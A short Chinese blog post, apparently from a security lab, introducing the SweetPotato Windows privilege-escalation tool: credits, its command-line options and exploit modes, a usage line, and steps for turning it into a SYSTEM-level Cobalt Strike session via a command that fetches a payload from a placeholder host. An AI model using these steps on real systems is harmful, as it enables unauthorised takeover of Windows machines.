基本介绍
从Windows 7到Windows 10 / Server 2019的本地服务到系统权限提升漏洞,也是土豆家族的有一个提权漏洞
项目地址
https://github.com/CCob/SweetPotato
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
-c, --clsid=VALUE CLSID (default BITS:
4991D34B-80A1-4291-83B6-3328366B9097)
-m, --method=VALUE Auto,User,Thread (default Auto)
-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-e, --exploit=VALUE Exploit mode
[DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
-l, --listenPort=VALUE COM server listen port (default 6666)
-h, --help Display this help
使用方法
SweetPotato.exe -a \\\"whoami\\\"
再使用过程中可以自定义 clsid 与端口,–help或者 – h查看帮助
同时可以对SweetPotato进行修改,使其可以直接上线一个system的session,效果图如下所示:
Step 1: 使用cs启动一个web攻击的简体
Step 2: 执行以下命令
SweetPotato.exe www.xxx.com/xxx.xxx
文末小结
后续将会继续给出一些土豆家族的提权漏洞的使用方法,敬请期待~
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34376.html